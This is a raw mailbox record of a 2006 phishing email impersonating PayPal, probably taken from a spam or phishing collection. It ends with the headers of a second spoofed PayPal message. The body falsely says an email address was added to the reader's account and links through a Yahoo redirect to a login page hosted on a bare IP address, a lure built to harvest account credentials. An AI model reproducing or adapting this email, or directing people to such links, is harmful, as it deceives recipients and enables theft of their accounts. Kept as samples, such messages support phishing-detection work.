From: "PayPal" <admin@paypal.com>
Reply-To: "PayPal" <admin@paypal.com>
To: nobody@example.com
Subject: Additional email address added to your PayPal account 
Date: Sat, 15 Apr 2006 05:15:20 +0400
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="--507098622793414"
X-Priority: 1
X-MSMail-Priority: High
Status: O
X-Status: 
X-Keywords:                  
X-UID: 792

----507098622793414
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>

<head>
<meta http-equiv=3DContent-Type content=3D"text/html; charset=3Dwindows-12=
52">
<meta name=3DGenerator content=3D"Microsoft Word 11 (filtered)">
<title>You've added an additional email address to your PayPal account</ti=
tle> 
<style>
<!--
 /* Style Definitions */
 p.MsoNormal, li.MsoNormal, div.MsoNormal
 {margin:0in;
 margin-bottom:.0001pt;
 font-size:12.0pt;
 font-family:"Times New Roman";}
a:link, span.MsoHyperlink
 {color:blue;
 text-decoration:underline;}
a:visited, span.MsoHyperlinkFollowed
 {color:purple;
 text-decoration:underline;}
p
 {margin-right:0in;
 margin-left:0in;
 font-size: 12.0pt;
 font-family:"Times New Roman";}
@page Section1
 {size:8.5in 11.0in;
 margin:1.0in 1.25in 1.0in 1.25in;}
div.Section1
 {page:Section1;}
-->
</style>

</head>

<body lang=3DEN-US link=3Dblue vlink=3Dpurple>

<div class=3DSection1>

<p class=3DMsoNormal><span style=3D'font-size:11.0pt'>You've added an addi=
tional
email address to your PayPal account.</span></p>

  <p class=3DMsoNormal><span style=3D'font-size:11.0pt'>If you don't agree=
 with this 
    email denismce93@comcast.net and if you need 
    assistance </span><span style=3D'font-size: 11.0pt'>with your account,=
 </span></p>
  <p class=3DMsoNormal><span style=3D'font-size:11.0pt'>please <a target=3D=
"_blank"  href=3D"http://rds.yahoo.com/_ylt  LaSV66fNtDg.kAUoJXNyoA;_ylu=3D=
X3oDMTE2ZHVuZ3E3BGNvbG8DdwRsA1dTMQRwb3MDMwRzZWMDc3IEdnRpZANGNjU1Xzc1/SIG=14=
8vsd1jp/EXP=1138544186/**http%3a//195.98.59.34/~test/.us/link.php?bWFpIHBy=
b3N0=3DaWxvciBtYWkgc3VnZXRpIHB1bGEgZnV0dXZhIG1hbWVsZSBpbiBndXRhIGRlIGxhYmF=
yaSBjZSBzdW50ZXRpIHNpIGRvYm90b2NpIHBpc2VtYX" 
> click here </a> to login to your account.</span></p>
  <p class=3DMsoNormal><span style=3D'font-size:11.0pt'>&nbsp;</span></p>

  <p class=3DMsoNormal><span style=3D'font-size:11.0pt'>To make sure you c=
an use your 
    PayPal account the next time you make a purchase,</span></p>
  <p class=3DMsoNormal><span style=3D'font-size: 11.0pt'> all you need to =
do is confirm 
    or not your email address. </span></p>

  <p class=3DMsoNormal><span style=3D'font-size:11.0pt'>If your email prog=
ram has problems 
    with hypertext links, </span></p>
  <p class=3DMsoNormal><span style=3D'font-size:11.0pt'>you may also confi=
rm your 
    email address by logging in to your account.</span></p>

<p class=3DMsoNormal><span style=3D'font-size:11.0pt'>&nbsp;</span></p>

<p class=3DMsoNormal><span style=3D'font-size:11.0pt'>&nbsp;</span></p>

<p class=3DMsoNormal><span style=3D'font-size:11.0pt'>Thank you for using =
PayPal! </span></p>

<p class=3DMsoNormal><span style=3D'font-size:11.0pt'>The PayPal Team</spa=
n></p>

<p class=3DMsoNormal><span style=3D'font-size:11.0pt'>--------------------=
--------------------------------------------</span></p>

<p class=3DMsoNormal><span style=3D'font-size:11.0pt'>Please do not reply =
to this
email. This mailbox is not monitored and you will not receive a response.<=
/span></p>

<p class=3DMsoNormal><span style=3D'font-size:11.0pt'>For assistance, log =
in to
your PayPal account and click the <a target=3D"_blank"  href=3D"http://rds=
yahoo.com/_ylt  LaSV66fNtDg.kAUoJXNyoA;_ylu=3DX3oDMTE2ZHVuZ3E3BGNvbG8DdwR=
sA1dTMQRwb3MDMwRzZWMDc3IEdnRpZANGNjU1Xzc1/SIG=148vsd1jp/EXP=1138544186/**h=
ttp%3a//195.98.59.34/~test/.us/link.php?bWFpIHByb3N0=3DaWxvciBtYWkgc3VnZXR=
pIHB1bGEgZnV0dXZhIG1hbWVsZSBpbiBndXRhIGRlIGxhYmFyaSBjZSBzdW50ZXRpIHNpIGRvY=
m90b2NpIHBpc2VtYX" 
> Help</a> 
link located in the top right corner of any PayPal page. </span></p>

<p class=3DMsoNormal><span style=3D'font-size:11.0pt'>--------------------=
--------------------------------------------</span></p>

<p class=3DMsoNormal><span style=3D'font-size:11.0pt'>&nbsp;</span></p>

<p class=3DMsoNormal><span style=3D'font-size:11.0pt'>PayPal Email ID PP05=
9</span></p>

</div>

</body>

</html>



----507098622793414--

From Support@PayPal.com  Sat Apr 15 00:16:23 2006
Return-Path: <Support@PayPal.com>
X-Original-To: nobody@login.example.com
Delivered-To: nobody@login.example.com
Received: from mail1.example.com (mail1.example.com [10.5.6.7])
	by naughty.example.com (Postfix) with ESMTP
	id 6D03B5370E6; Sat, 15 Apr 2006 00:16:23 -0400 (EDT)
Received: from 200.200.220.200 (static-68-161-239-65.ny325.east.verizon.net [68.161.239.65])
	by mail1.example.com (Postfix) with SMTP id 068296CCE5F;
	Fri, 14 Apr 2006 19:28:50 -0400 (EDT)
Received: from 6.50.180.134 by ; Sat, 15 Apr 2006 00:15:47 -0500
Message-ID: <UUVWZJZUXHSDQVFEHRSBOS@PayPal.com>
